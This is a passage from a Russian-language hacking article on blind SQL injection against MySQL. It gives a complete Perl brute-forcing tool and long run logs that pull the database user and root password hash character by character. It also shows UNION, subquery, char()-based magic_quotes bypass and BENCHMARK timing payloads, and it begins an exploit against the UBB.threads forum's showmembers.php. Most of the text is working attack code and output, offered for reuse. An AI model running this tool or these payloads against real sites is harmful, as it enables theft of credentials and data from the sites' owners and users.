__ Программная реализация __

Перебор вручную даже с помощью уменьшения диапазона перебора все равно оказывается делом достаточно утомительным и для дальнейших примеров я подумал, что было бы неплохо написать скрипт который автоматом за нас будет перебирать символы. Код этого скрипта и небольшое описание приведены в данном разделе статьи.
--- start r57sql_ocb.pl ---

#!/usr/bin/perl

# r57sql_ocb.pl
# sql-databases one char bruteforce tool

use LWP::UserAgent;

$path = $ARGV[0];
# запрос с уязвимому скрипту с параметром

$query = $ARGV[1];
# запрос к БД (подзапрос) результат которого будет вставлен в функцию substring()

$s_num = $ARGV[2];
# позиция символа который перебираем

$string = $ARGV[3];
# строка в ответе сервера по наличию которой судим о успешном выполнении запроса к БД

if (@ARGV < 4) { &usage; }

# диапазон символов для перебора
$min = $ARGV[4] || 97; # a
$max = $ARGV[5] || 122; # z

&found($min,$max);

# подпрограмма уменьшения диапазона символов
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
# если диапазон менее 5 символов то переходим к перебору
if (($fmax-$fmin)<5) { &crack($fmin,$fmax); }
# иначе находим середину диапазона
print "-> Try $fmin .. $fmax -> ";
$r = int($fmax - ($fmax-$fmin)/2);
$check = ">$r";
# проверяем ответ скрипта и в зависимости от возвращенного результата
# рекурсивно вызываем функцию с новым диапазоном (уже уменьшенным в 2 раза)
if ( &check($check) ) { print "Char > $r\r\n"; &found($r,$fmax); }
else { print "Char < $r\r\n"; &found($fmin,$r+1); }
}

# подпрограмма поиска перебором
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
# проходим циклом по диапазону
while ($i<$cmax)
{
$crcheck = "=$i";
print "-> Try $i ->";
# проверяем ответ скрипта, если ответ положительный то выводим символ и выходим
if ( &check($crcheck) )
{ print " FOUND!\r\n-> Ascii: $i\r\n-> Char: ".chr($i); exit(); }
else { print " NO =(\r\n"; }
$i++;
}
print "NOT FOUND"; exit();
}

# подпрограмма проверки результата запроса
sub check($)
{
$ccheck = $_[0];
# формируем запрос к скрипту
$http_query = $path." AND ascii(lower(substring(".$query.",".$s_num.",1)))". $ccheck;
# отправляем запрос
$mcb_reguest = LWP::UserAgent->new() or die;
$res = $mcb_reguest->post($http_query);
# получаем ответ сервера
@results = $res->content;
foreach $result(@results)
{
# ищем в ответе скрипта строку совпадающую с нашим условием
if ($result =~ /$string/) { return 1; }
}
return 0;
}

sub usage
{
print "Usage: $0 [path_to_script?param] [DB_query] [symbol_position]
[return_string] [brute_min_char] [brute_max_char]\r\n";

print "e.g. : $0 http://server.com/users.php?id=1 \"user()\" 1 \"Found: 3\" 48 57";
exit();
}

--- end r57sql_ocb.pl ---
Скрипт запускается со следующими параметрами:
Путь к скрипту включая параметр уязвимый к sql injection, в нашем случае он будет http://server.com/users.php?id=1
Запрос к базе данных который вставляется в функцию substring(), т.е. запрос, результат выполнения которого мы будем перебирать.
Позиция символа для перебора.
Строка каторая должна присутствовать в выведенном ответе скрипта при выполнении условия.
6. Необязательные параметры в которых можно задать начальный и конечный ascii-коды для обозначения диапазона перебираемых символов.
Также в процессе работы скрипт выводит добавляемые условия, перебираемые диапазоны и результаты запросов для более наглядного просмотра алгоритма и подсчета количества запросов необходимых для получения одного символа.
Пример работы скрипта для получения имени пользователя:
C:\>r57sql_ocb.pl http://server.com/users.php?id=1 "user()" 1 "Found: 3"
-> Try 97 .. 122 -> Char > 109
-> Try 109 .. 122 -> Char < 115
-> Try 109 .. 116 -> Char > 112
-> Try 112 -> NO =(
-> Try 113 -> NO =(
-> Try 114 -> FOUND!
-> Ascii: 114
-> Char: r
C:\>r57sql_ocb.pl http://server.com/users.php?id=1 "user()" 2 "Found: 3"
-> Try 97 .. 122 -> Char > 109
-> Try 109 .. 122 -> Char < 115
-> Try 109 .. 116 -> Char < 112
-> Try 109 -> NO =(
-> Try 110 -> NO =(
-> Try 111 -> FOUND!
-> Ascii: 111
-> Char: o
C:\>r57sql_ocb.pl http://server.com/users.php?id=1 "user()" 3 "Found: 3"
-> Try 97 .. 122 -> Char > 109
-> Try 109 .. 122 -> Char < 115
-> Try 109 .. 116 -> Char < 112
-> Try 109 -> NO =(
-> Try 110 -> NO =(
-> Try 111 -> FOUND!
-> Ascii: 111
-> Char: o
C:\>r57sql_ocb.pl http://server.com/users.php?id=1 "user()" 4 "Found: 3"
-> Try 97 .. 122 -> Char > 109
-> Try 109 .. 122 -> Char > 115
-> Try 115 .. 122 -> Char < 118
-> Try 115 -> NO =(
-> Try 116 -> FOUND!
-> Ascii: 116
-> Char: t

Итак наш пользователь "root" =)

Небольшими изменениями в коде можно сделать чтобы скрипт автоматом подбирал все символы из строки и работал не только с параметром типа integer (в нашем случае это id) но для данной статьи это не нужно, а те кому надо думаю сами смогут дополнить скрипт, там кода на 5 минут.

__ Подзапросы __

Итак как было описано ранее атакующий с помощью перебора смог получить имя пользователя от которого скрипт работает с базой данных. Чтож это неприятно, но это и не смертельно. Если бы этим все и ограничивалось, то можно было бы совсем не беспокоиться, однако все становится на порядок опаснее когда база данных, на которую производится атака, поддерживает подзапросы. В общем случае подзапрос выглядит следующим образом:

SELECT v1 from t1 WHERE v2=(SELECT v3 from t2);

Полученный результат подзапроса из таблицы t2 подставляется в условие в запросе к таблице t1.

Применительно к нашему случаю можно использовать подзапросы в функции substring() и следовательно результат подзапроса мы и обрабатываем этой функцией и соответственно его и перебираем

Конкретно: substring((select v1 from t1),1,1)

Сначала выполняется подзапрос select v1 from t1 , после чего результат его выполнения вставляется в функцию которая выдирает из результата первый символ. А тут уже вспоминаем технику описанную ранее и сравниваем этот символ с тем что нам надо =)
Как видно из вышеописанного, атакующий получает возвожность выполнения любого запроса к базе данных и путем посимвольного перебора имеет возможность получить результат запроса. Из этого следует, что атакующий имеет возможность получить ЛЮБУЮ информацию из базы данных (точнее сказать не любую, а любую доступную тому пользователю от которого с базой работает уязвимый скрипт).

Основная особенность работы с подзапросами состоит в том, что наш подзапрос должен возвращать только одну запись в результате выполнения, иначе в ходе выполнения запроса будет возникать ошибка. Данная проблема легко решается вставкой дополнительных условий в подзапрос или использованием LIMIT ( LIMIT [смещение,] количество ).

Пример работы с подзапросами:

server.com/users.php?id=1 AND ascii(lower(substring((SELECT password from mysql.user WHERE user="root" LIMIT 1),1,1)))>48

Данный запрос возвращает результат в случае если ascii-код первого символа пароля пользователя root полученный из таблицы mysql.user больше 48 (т.е. символ с кодом больше кода символа 1).

В данном запросе сначала выполняется подзапрос SELECT password from mysql.user WHERE user="root" LIMIT 1 возвращающий один результат. После этого полученный результат вставляется в функцию substring() которая выделяет один символ из этого результата. Потом символ переводится в нижний регистр и с помощью ascii() получаем код этого символа, который и сравнивается с переданным нами числом.

Используя скрипт можно продемонстрировать получение первых символов из пароля пользователя root:

C:\>r57sql_ocb.pl http://server.com/users.php?id=1 "(SELECT password from
mysql.user WHERE user=\"root\" LIMIT 1)" 1 "Found: 3" 48 122
-> Try 48 .. 122 -> Char < 85
-> Try 48 .. 86 -> Char < 67
-> Try 48 .. 68 -> Char < 58
-> Try 48 .. 59 -> Char < 53
-> Try 48 .. 54 -> Char < 51
-> Try 48 -> NO =(
-> Try 49 -> NO =(
-> Try 50 -> FOUND!
-> Ascii: 50
-> Char: 2
C:\>r57sql_ocb.pl http://server.com/users.php?id=1 "(SELECT password from
mysql.user WHERE user=\"root\" LIMIT 1)" 2 "Found: 3" 48 122
-> Try 48 .. 122 -> Char < 85
-> Try 48 .. 86 -> Char < 67
-> Try 48 .. 68 -> Char < 58
-> Try 48 .. 59 -> Char > 53
-> Try 53 .. 59 -> Char > 56
-> Try 56 -> NO =(
-> Try 57 -> FOUND!
-> Ascii: 57
-> Char: 9
C:\>r57sql_ocb.pl http://server.com/users.php?id=1 "(SELECT password from
mysql.user WHERE user=\"root\" LIMIT 1)" 3 "Found: 3" 48 122
-> Try 48 .. 122 -> Char > 85
-> Try 85 .. 122 -> Char < 103
-> Try 85 .. 104 -> Char > 94
-> Try 94 .. 104 -> Char < 99
-> Try 94 .. 100 -> Char > 97
-> Try 97 -> NO =(
-> Try 98 -> FOUND!
-> Ascii: 98
-> Char: b
C:\>r57sql_ocb.pl http://server.com/users.php?id=1 "(SELECT password from
mysql.user WHERE user=\"root\" LIMIT 1)" 4 "Found: 3" 48 122
-> Try 48 .. 122 -> Char > 85
-> Try 85 .. 122 -> Char < 103
-> Try 85 .. 104 -> Char > 94
-> Try 94 .. 104 -> Char < 99
-> Try 94 .. 100 -> Char < 97
-> Try 94 -> NO =(
-> Try 95 -> NO =(
-> Try 96 -> NO =(
-> Try 97 -> FOUND!
-> Ascii: 97
-> Char: a

Итак первыми символами в пароле являются: 29ba

Следующая проблема которая может возникнуть при использовании условий в подзапросе это проблема с magic_quotes при условиях типа user="root". Данная проблема легко обходится видоизменением условия с помощью функции char().

Условие: user="root"
соответствует условию: user=char(114,111,111,116)

Итак получаем:
C:\>r57sql_ocb.pl http://server.com/users.php?id=1"(SELECT password
from mysql.user WHERE user=char(114,111,111,116) LIMIT 1)" 4 "Found: 3" 48 122
-> Try 48 .. 122 -> Char > 85
-> Try 85 .. 122 -> Char < 103
-> Try 85 .. 104 -> Char > 94
-> Try 94 .. 104 -> Char < 99
-> Try 94 .. 100 -> Char < 97
-> Try 94 -> NO =(
-> Try 95 -> NO =(
-> Try 96 -> NO =(
-> Try 97 -> FOUND!
-> Ascii: 97
-> Char: a
C:\>r57sql_ocb.pl http://server.com/users.php?id=1 "(SELECT password
from mysql.user WHERE user=char(114,111,111,116) LIMIT 1)" 5 "Found: 3" 48 122
-> Try 48 .. 122 -> Char > 85
-> Try 85 .. 122 -> Char < 103
-> Try 85 .. 104 -> Char > 94
-> Try 94 .. 104 -> Char > 99
-> Try 99 .. 104 -> Char < 101
-> Try 99 -> NO =(
-> Try 100 -> FOUND!
-> Ascii: 100
-> Char: d
C:\>r57sql_ocb.pl http://server.com/users.php?id=1 "(SELECT password from
mysql.user WHERE user=char(114,111,111,116) LIMIT 1)" 6 "Found: 3" 48 122
-> Try 48 .. 122 -> Char < 85
-> Try 48 .. 86 -> Char < 67
-> Try 48 .. 68 -> Char < 58
-> Try 48 .. 59 -> Char < 53
-> Try 48 .. 54 -> Char < 51
-> Try 48 -> NO =(
-> Try 49 -> FOUND!
-> Ascii: 49
-> Char: 1
Четвертый, пятый и шестой символы в пароле соответственно ad1 и magic_quotes нас уже не волнуют =)

Несколько позиций полученных с помощью LIMIT из запроса можно обьединить в одну строку с помощью функции CONCAT() и получать перебором символы из этой обьединенной строки. Например для получения первых трех записей из столбеца login из нашей тестовой таблицы users можно использовать следующее обьединение:

CONCAT_WS("|",(select login from users LIMIT 0,1),(select login from users LIMIT 1,1),(select login from users LIMIT 2,1))

Символ | будет использоваться в качестве разделителей и данная функция возвращает результат типа:

admin|lamer|hacker

В случае использования с нашим скриптом запрос принимает вид:

http://server.com/users.php?id=1 AND ascii(lower(substring(CONCAT_WS("|",(select login from users LIMIT 0,1),(select login from users LIMIT 1,1),(select login from users LIMIT 2,1)),1,1)))=97

И возврашает результат "Found: 3" т.к. первый символ из результата это "a" ( [a]dmin )

__ MySQL версий => 4.0 и < 4.1 __

В данных версиях БД не поддерживается возможность использования подзапросов, поэтому для получения информации из других таблиц ( отличных от той с которой работает скрипт ) приходится использовать предложение UNION. Рассмотрим как это делается на нашем примере. Для начала необходимо найти параметр id при котором наш запрос будет возвращать нулевой результат, например http://server.com/users.php?id=666 , что необходимо для того, чтобы данный (первый) запрос не оказывал влияния на вывод всего обьединения. Т.е. теперь при обьединении через UNION со вторым запросом к БД имеенно ТОЛЬКО ВТОРОЙ запрос будет оказывать влияние на вывод (или-же наоборот отсутствие вывода) нашего скрипта.
Более подробно:

Запрос: http://server.com/users.php?id=666
Ответ: "Found: 0"

А запрос: http://server.com/users.php?id=666 UNION SELECT 1 FROM mysql.user WHERE user="root"
Возвратит "Found: 1" в случае если в таблице mysql.user существует запись для пользователя root.

Далее вводим дополнительные условия:

Запрос: http://server.com/users.php?id=666 UNION SELECT 1 FROM mysql.user WHERE user="root" AND ascii(lower(substring(password,1,1)))>48

Данный запрос выводит результат "Found: 1" в случае если в таблице mysql.user существует запись для пользователя root и код первого символа из столбца password для данной записи более 48.

Следует обратить внимание на то, что если в предыдущем случае при описании работы с подзапросами мы перебирали именно результат возвращенный подзапросом т.е. нам было важно, что возвратит этот подзапрос, то в данном случае результат который возвращает второй запрос (после UNION) нас неинтересует, нам важно только присутствие или отсутствие этого результата при заданных нами условиях. И мы таким образом просто определяем выполняется наше условие (условия) или нет. А вот то, что мы перебираем и задается в этом условии. Надеюсь понятно обьяснил разницу между методами, если что-то вдруг непонятно то просто попробуйте повторить описанное у себя на локальной БД и все сразу станет на свои места.

Теперь можно используя обьединение UNION попробовать получить перебором записи из нашей тестовой таблицы. Только необходимо заметить что желательно чтобы условия во втором запросе позволяли совпадать только одной записи т.к. в противном случае перебор может выдавать неправильные значения, обьясню на примере:

Пусть в таблице blah существуют две записи для пользователя root:

+-------+------+
| user | pass |
+-------+------+
| root | aaa |
| root | bbb |
+-------+------+

Для таких записей запросы

http://server.com/users.php?id=666 UNION SELECT 1 FROM blah WHERE user="root" AND ascii(lower(substring(pass,1,1)))=97

и

http://server.com/users.php?id=666 UNION SELECT 1 FROM blah WHERE user="root" AND ascii(lower(substring(pass,1,1)))=98

вернут результат. И перебор будет возвращать неправильный результат.
Так что чем больше условий будет во втором запросе тем больше вероятность получения правильного результата с помощью перебора.

Для посимвольного перебора с использованием UNION также можно использовать наш скрипт, единственное условие это то что необходимо будет добавить часть запроса в первый параметр. Вот пример получения пароля пользователя root из таблицы mysql.user:
C:\>r57sql_ocb.pl "http://server.com/users.php?id=666 UNION SELECT 1 FROM
mysql.user WHERE user=char(114,111,111,116)" "password" 1 "Found: 1" 1 122
-> Try 1 .. 122 -> Char < 61
-> Try 1 .. 62 -> Char > 31
-> Try 31 .. 62 -> Char > 46
-> Try 46 .. 62 -> Char < 54
-> Try 46 .. 55 -> Char < 50
-> Try 46 .. 51 -> Char > 48
-> Try 48 -> NO =(
-> Try 49 -> NO =(
-> Try 50 -> FOUND!
-> Ascii: 50
-> Char: 2
C:\>r57sql_ocb.pl "http://server.com/users.php?id=666 UNION SELECT 1 FROM
mysql.user WHERE user=char(114,111,111,116)" "password" 2 "Found: 1" 1 122
-> Try 1 .. 122 -> Char < 61
-> Try 1 .. 62 -> Char > 31
-> Try 31 .. 62 -> Char > 46
-> Try 46 .. 62 -> Char > 54
-> Try 54 .. 62 -> Char < 58
-> Try 54 .. 59 -> Char > 56
-> Try 56 -> NO =(
-> Try 57 -> FOUND!
-> Ascii: 57
-> Char: 9
C:\>r57sql_ocb.pl "http://server.com/users.php?id=666 UNION SELECT 1 FROM
mysql.user WHERE user=char(114,111,111,116)" "password" 3 "Found: 1" 1 122
-> Try 1 .. 122 -> Char > 61
-> Try 61 .. 122 -> Char > 91
-> Try 91 .. 122 -> Char < 106
-> Try 91 .. 107 -> Char < 99
-> Try 91 .. 100 -> Char > 95
-> Try 95 .. 100 -> Char > 97
-> Try 97 -> NO =(
-> Try 98 -> FOUND!
-> Ascii: 98
-> Char: b
C:\>r57sql_ocb.pl "http://server.com/users.php?id=666 UNION SELECT 1
FROM mysql.user WHERE user=char(114,111,111,116)" "password" 4 "Found: 1" 1 122
-> Try 1 .. 122 -> Char > 61
-> Try 61 .. 122 -> Char > 91
-> Try 91 .. 122 -> Char < 106
-> Try 91 .. 107 -> Char < 99
-> Try 91 .. 100 -> Char > 95
-> Try 95 .. 100 -> Char < 97
-> Try 95 -> NO =(
-> Try 96 -> NO =(
-> Try 97 -> FOUND!
-> Ascii: 97
-> Char: a

Для полной картины, в первом примере, например, полные запросы к базе данных и алгоритм выглядят следующим образом:

* Если ответ "Found: 1" то условие естинно т.е. True , иначе ответ "Found: 0" и условие ложно False

1.
Запрос: SELECT status FROM users WHERE status=666 UNION SELECT 1 FROM mysql.user WHERE user=char(114,111,111,116) AND ascii(lower(substring(password,1,1)))>61
Условие: False

2.
Запрос: SELECT status FROM users WHERE status=666 UNION SELECT 1 FROM mysql.user WHERE user=char(114,111,111,116) AND ascii(lower(substring(password,1,1)))>31
Условие: True

3.
Запрос: SELECT status FROM users WHERE status=666 UNION SELECT 1 FROM mysql.user WHERE user=char(114,111,111,116) AND ascii(lower(substring(password,1,1)))>46
Условие: True

4.
Запрос: SELECT status FROM users WHERE status=666 UNION SELECT 1 FROM mysql.user WHERE user=char(114,111,111,116) AND ascii(lower(substring(password,1,1)))>54
Условие: False

5.
Запрос: SELECT status FROM users WHERE status=666 UNION SELECT 1 FROM mysql.user WHERE user=char(114,111,111,116) AND ascii(lower(substring(password,1,1)))>50
Условие: False

6.
Запрос: SELECT status FROM users WHERE status=666 UNION SELECT 1 FROM mysql.user WHERE user=char(114,111,111,116) AND ascii(lower(substring(password,1,1)))>48
Условие: True

7.
Запрос: SELECT status FROM users WHERE status=666 UNION SELECT 1 FROM mysql.user WHERE user=char(114,111,111,116) AND ascii(lower(substring(password,1,1)))=49
Условие: False

8.
Запрос: SELECT status FROM users WHERE status=666 UNION SELECT 1 FROM mysql.user WHERE user=char(114,111,111,116) AND ascii(lower(substring(password,1,1)))=50
Условие: True

Таким образом атакующий обладает возможностью получать информацию из любой таблицы в БД даже при условиях, что вывод данных, непосредственно полученных из запроса, не осуществляется. Как и в случае с подзапросами данный метод перебора может применяться не только в запросах выборки из БД типа SELECT ..., но и в запросах обновления записей типа UPDATE ... при условии, что есть возможность определить был-ли выполнен запрос или нет.

__ MySQL версии < 4.0 __

Вот мы и подошли к самому интересному разделу данной статьи. Раньше я не встречал документов описывающих методику использования атак типа внедрения sql кода для получения информации о записях в базе данных на версиях MySQL ниже 4.0. И в разнообразных эксплоитах, которые можно найти в сети, основанных на данном типе уязвимости пишут, что атака осуществима только на версиях поддерживающих UNION. Но гораздо чаще все-же встречаются более низкие версии. =(
Без поддержки обьединения запросов с помощью UNION и без поддержки подзапросов атакующий очень сильно урезан в правах, точнее сказать он ограничен таблицей (или таблицами) с которыми работает уязвимый запрос (запрос в который мы добавляем наш sql код). Кроме информации из таблиц с которыми работает уязвимый запрос атакующий также может получить значения некоторых системных переменных о которых будет рассказано далее, а пока перейдем к получению данных из таблицы.

Итак предположим, что наш уязвимый php-скрипт работает с базой данных версия которой ниже 4.

Добавим в запрос к серверу условие ограничивающее выборку еще и именем пользователя (конечно это выполнимо при условии, что мы уже располагаем информацией о имени пользователя), таким образом запрос примет следующий вид:
server.com/users.php?id=1 AND login="admin"
В БД выполняется запрос
SELECT status FROM users WHERE status=1 AND login="admin"
Если данный запрос вернет результат, то мы определяем, что в таблице есть запись у которой в поле status стоит значение 1, а в поле login находится значение admin. В нашем случае только одна запись совпадает с данным условием, а в других случаях придется вводить условия пока выборка не станет возвращать только один результат.
Теперь можно вставить еще одно условие
server.com/users.php?id=1 AND login="admin" AND ascii(lower(substring(password,1,1)))>48
в БД выполняется запрос
SELECT status FROM users WHERE status=1 AND login="admin" AND ascii(lower(substring(password,1,1)))>48
Данный запрос возвращает результат только в случае если в таблице есть запись у которой в поле status стоит значение 1, в поле login находится значение admin а код первого символа значения полученного из поля password более 48. Первыми условиями мы ограничиваем выборку строкой из которой хотим получить запись из нужного столбца, а последним условием соответственно проверяем совпадение или несовпадение кода символа полученного из записи. Таким образом можно перебором получить значение данного столбца, этой записи. Меняя первые условия в запросе мы можем менять строки, значения из которых мы собираемся перебирать.

Пример получения записи из столбца password для юзера admin на mysql версии ниже 4.0:
C:\>r57sql_ocb.pl "http://server.com/users.php?id=666 UNION SELECT 1
FROM mysql.user WHERE user=char(114,111,111,116)" "password" 1 "Found: 1" 1 122
-> Try 1 .. 122 -> Char < 61
-> Try 1 .. 62 -> Char > 31
-> Try 31 .. 62 -> Char > 46
-> Try 46 .. 62 -> Char < 54
-> Try 46 .. 55 -> Char < 50
-> Try 46 .. 51 -> Char > 48
-> Try 48 -> NO =(
-> Try 49 -> NO =(
-> Try 50 -> FOUND!
-> Ascii: 50
-> Char: 2
C:\>r57sql_ocb.pl "http://server.com/users.php?id=666 UNION SELECT 1
FROM mysql.user WHERE user=char(114,111,111,116)" "password" 2 "Found: 1" 1 122
-> Try 1 .. 122 -> Char < 61
-> Try 1 .. 62 -> Char > 31
-> Try 31 .. 62 -> Char > 46
-> Try 46 .. 62 -> Char > 54
-> Try 54 .. 62 -> Char < 58
-> Try 54 .. 59 -> Char > 56
-> Try 56 -> NO =(
-> Try 57 -> FOUND!
-> Ascii: 57
-> Char: 9
C:\>r57sql_ocb.pl "http://server.com/users.php?id=666 UNION SELECT 1
FROM mysql.user WHERE user=char(114,111,111,116)" "password" 3 "Found: 1" 1 122
-> Try 1 .. 122 -> Char > 61
-> Try 61 .. 122 -> Char > 91
-> Try 91 .. 122 -> Char < 106
-> Try 91 .. 107 -> Char < 99
-> Try 91 .. 100 -> Char > 95
-> Try 95 .. 100 -> Char > 97
-> Try 97 -> NO =(
-> Try 98 -> FOUND!
-> Ascii: 98
-> Char: b
C:\>r57sql_ocb.pl "http://server.com/users.php?id=666 UNION SELECT 1
FROM mysql.user WHERE user=char(114,111,111,116)" "password" 4 "Found: 1" 1 122
-> Try 1 .. 122 -> Char > 61
-> Try 61 .. 122 -> Char > 91
-> Try 91 .. 122 -> Char < 106
-> Try 91 .. 107 -> Char < 99
-> Try 91 .. 100 -> Char > 95
-> Try 95 .. 100 -> Char < 97
-> Try 95 -> NO =(
-> Try 96 -> NO =(
-> Try 97 -> FOUND!
-> Ascii: 97
-> Char: a
И так далее...

__ Системные переменные __

Кроме получения информации из записей таблицы (или таблиц) с которыми работает запрос, в который мы внедряем наш код, мы также можем получить перебором значения некоторых системных переменных. Пример такого получения значения уже встречался ранее в статье когда мы получали имя пользователя из user().
Кроме user() мы можем получить следующие значения:
database() - название базы данных с которой работает наш запрос.
version() - версия базы данных с которой работает наш скрипт. Кроме version() можно также использовать и @@version что является синонимом данной функции и поддержка которого введена в mysql начиная с версий 3.23.50

Как пример получение версии БД через наш уязвимый скрипт:

C:\>r57sql_ocb.pl "http://127.0.0.1/users.php?id=1" "@@version" 1 "Found: 3" 46 57
-> Ascii: 51
-> Char: 3
C:\>r57sql_ocb.pl "http://127.0.0.1/users.php?id=1" "@@version" 2 "Found: 3" 46 57
-> Ascii: 46
-> Char: .
C:\>r57sql_ocb.pl "http://127.0.0.1/users.php?id=1" "@@version" 3 "Found: 3" 46 57
-> Ascii: 50
-> Char: 2
C:\>r57sql_ocb.pl "http://127.0.0.1/users.php?id=1" "@@version" 4 "Found: 3" 46 57
-> Ascii: 51
-> Char: 3
C:\>r57sql_ocb.pl "http://127.0.0.1/users.php?id=1" "@@version" 5 "Found: 3" 46 57
-> Ascii: 46
-> Char: .
C:\>r57sql_ocb.pl "http://127.0.0.1/users.php?id=1" "@@version" 6 "Found: 3" 46 57
-> Ascii: 53
-> Char: 5
C:\>r57sql_ocb.pl "http://127.0.0.1/users.php?id=1" "@@version" 7 "Found: 3" 46 57
-> Ascii: 56
-> Char: 8
C:\>r57sql_ocb.pl "http://127.0.0.1/users.php?id=1" "@@version" 8 "Found: 3" 46 57
-> Try 46 .. 57 -> Char < 51
-> Try 46 .. 52 -> Char < 49
-> Try 46 -> NO =(
-> Try 47 -> NO =(
-> Try 48 -> NO =(
-> Try 49 -> NO =(
NOT FOUND

Таким образом версия БД: 3.23.58
Для ускорения перебора мы используем диапазон 46..57 включающий в себя цифры и точку. Именно поэтому последний запрос возвращает NOT FOUND.

__ Задержки __

Нет, это не те задержки которые случаются у девушек и указывают на то, что пришло время идти покупать соску, тут все не так страшно =)
В вышеописанных примерах наш перебор основывался на том, что существует вывод какой-либо информации о том был ли успешно выполнен запрос в БД (точнее был ли возвращен результат запроса) или же нет. Но бывают случаи когда доступа к такой информации у атакующего нет.
Например на сервере существует такой скрипт stat.php:
<?
error_reporting(0);
... подключение к базе данных ...
@mysql_query("UPDATE stat SET num=num+1 WHERE id=$id");
echo "OK";
?>
Данный скрипт работает с таблицей stat следующего вида:
+----+-----+------------+---------------+
| id | num | name | password |
+----+-----+------------+---------------+
| 1 | 100 | Яндыкс.ru | kewl_password |
| 2 | 200 | Румблер.ru | bad_password |
+----+-----+------------+---------------+
Скрипт в зависимости от переданного значения параметра id обновляет подходящую по условию запись, добавляя единицу к значению столбца num.
Никакой информации о результате выполнения запроса после этого не выводится и соответственно мы не можем таким образом определить выполнение или невыполнение дополнительного условия.
Для дополнительного условия мы будем использовать функцию if() которая позволяет вставлять результат в запрос в зависимости от выполнения или невыполнения условия указанного в качестве первого параметра в данной функции.
IF(expr1,expr2,expr3)
Если expr1 равно значению ИСТИНА (expr1 <> 0 и expr1 <> NULL), то функция IF() возвращает expr2, в противном случае - expr3.
Также мы будем использовать функцию BENCHMARK(count,expr) которая повторяет выполнение выражения expr заданное количество раз, указанное в аргументе count. Она может использоваться для определения того, насколько быстро MySQL обрабатывает данное выражение. Значение результата всегда равно 0.
В качестве выражения expr в функции benchmark мы будем использовать вычисление контрольной суммы с помощью функции md5()
MD5(string) - Вычисляет 128-битовую контрольную сумму MD5 для аргумента string. Возвращаемая величина представляет собой 32-разрядное шестнадцатеричное число.
Данные функции мы будем использовать следующим образом: benchmark(999999,md5(char(114,115,116)));
Если попробовать выполнить данную функцию в mysql то можно заметить, что на её выполнение требуется порядка 10 секунд.
mysql> select benchmark(999999,md5(char(114,115,116)));
+------------------------------------------+
| benchmark(999999,md5(char(114,115,116))) |
+------------------------------------------+
| 0 |
+------------------------------------------+
1 row in set (10.20 sec)

Итак делаем такой запрос к серверу:
server.com/stat.php?id=1 AND 1=if((substring(password,1,1)="u"),1,benchmark(999 999,md5(char(114,115,116))));

Вызывает выполнение в БД запроса

UPDATE stat SET num=num+1 WHERE id=1 AND 1=if((substring(password,1,1)="u"),1,benchmark(999 999,md5(char(114,115,116))));

Что происходит в данном запросе. Сначала берется значение столбца password из строки для которой id=1, после этого из этого значения с помощью функции substring() получаем первый символ. И сравниваем этот символ с символом "u".
Тут начинается самое интересное.
Если условие выполняется то функция if() возвращает значение указанное в качестве второго параметра т.е. 1 и запрос принимает вид: UPDATE stat SET num=num+1 WHERE id=1 AND 1=1 соответственно данный запрос выполняется и ничего экстраординарного не происходит, все как обычно.
В случае если условие указанное в функции if() невыполняется то функция пытается возвратить значение указанное в качестве третьего параметра функции т.е. benchmark(999999,md5(char(114,115,116))) соответственно для этого ей нужно для начала получить это значение и происходит вычисление данной функции. Но на это вычисление базе данных естественно требуется некоторое время, достаточно длительное. После чего значение 0 подставляется в запрос и соответственно запрос не выполняется т.к. условие 1=0 но это нас уже не интересует.
Суть в том, что при невыполнении условия в функции if() общее время выполнения запроса к базе данных получается большим чем время когда условие выполняется. И это время зависит от времени необходимого на работу функции bencmark. Соответственно наш уязвимый скрипт выполняется гораздо дольше при невыполнении условия.
Таким образом меняя условия внутри функции и смотря на время выполнения скрипта мы можем также как и ранее пользуясь substring() получить перебором значения из записи в таблице.

Попробовав выполнить запросы с различными условиями в базе данных можно понаблюдать за изменением веремени их выполнения:

1. Условие невыполняется
mysql> UPDATE stat SET num=num+1 WHERE id=1 AND 1=if((substring(password,1,1)="u"),1,benchmark(999 999,md5(char(114,115,116))));
Query OK, 0 rows affected (10.28 sec)
Rows matched: 0 Changed: 0 Warnings: 0

2. Условие выполняется
mysql> UPDATE stat SET num=num+1 WHERE id=1 AND 1=if((substring(password,1,1)="k"),1,benchmark(999 999,md5(char(114,115,116))));
Query OK, 1 row affected (0.00 sec)
Rows matched: 1 Changed: 1 Warnings: 0

Пример перебора с использованием задержек:

Запрос:
http://server.com/stat.php?id=1 AND 1=if((substring(password,1,1)="w"),1,benchmark(999 999,md5(char(114,115,116))));
Результат: Задержка вывода
Вывод: Первый символ в поле password для строки где id=1 не равен "w"

Запрос:
http://server.com/stat.php?id=1 AND 1=if((substring(password,1,1)="b"),1,benchmark(999 999,md5(char(114,115,116))));
Результат: Задержка вывода
Вывод: Первый символ не равен "b"

Запрос:
http://server.com/stat.php?id=1 AND 1=if((substring(password,1,1)="k"),1,benchmark(999 999,md5(char(114,115,116))));
Результат: Нет задержки
Вывод: Первый символ равен "k"

И так далее перебирая символы и позиции в строке можно полностью получить всю строку. Таким образом даже наличие вывода о выполнении или невыполнении запроса не является необходимым условием для осуществления посимвольного перебора записей из базы данных.

__ Конкретный пример __

Пришло время рассмотреть конкретный пример использования посимвольного перебора. Нашим пациентом станет форум UBB.threads в котором недавно нашли ошибку типа sql injection в файле showmembers.php. На данную уязвимость был выпущен эксплоит позволяющий получить пароль администратора через обьединение запросов с помощью UNION, естественно данный сплоит работает только на базах mysql версии выше 4.0 Мы попробуем написать эксплоит который будет работать на всех версиях БД.

Преведу код из файла showmembers.php:
// Set the default sort
$andlike = "";
if (empty($sb)) { $sb = 1; };
if ($like != "") {
$andlike = "AND U_Username LIKE '$like%'";
}


// --------------------------------------------------
// Grab the total number of users out of the database
$query = "
SELECT COUNT(*)
FROM {$config['tbprefix']}Users
WHERE U_Approved='yes'
$andlike
";

В данном коде скрипт запросом получает количество пользователей из таблицы у которых имя пользователя U_Username совпадает со строкой переданной нами в качестве параметра like.

Например для того чтобы найти пользователей у которых username начинается с 123 мы отдаем такую команду в браузере

http://127.0.0.1/UBB/ubbthreads/show...age=1&like=123

В базе данных выполняется запрос

SELECT COUNT(*) FROM w3t_Users WHERE U_Approved='yes' AND U_Username LIKE '123%'

Так как параметр like никак не проверяется перед помещением в запрос мы можем вставить в данный запрос дополнительные условия:

http://127.0.0.1/UBB/ubbthreads/showmembers.php?Cat=&page=1&like=12345' AND ascii(lower(substring(U_Password,1,1)))=50 /*

Что вызовет выполнение в БД запроса:

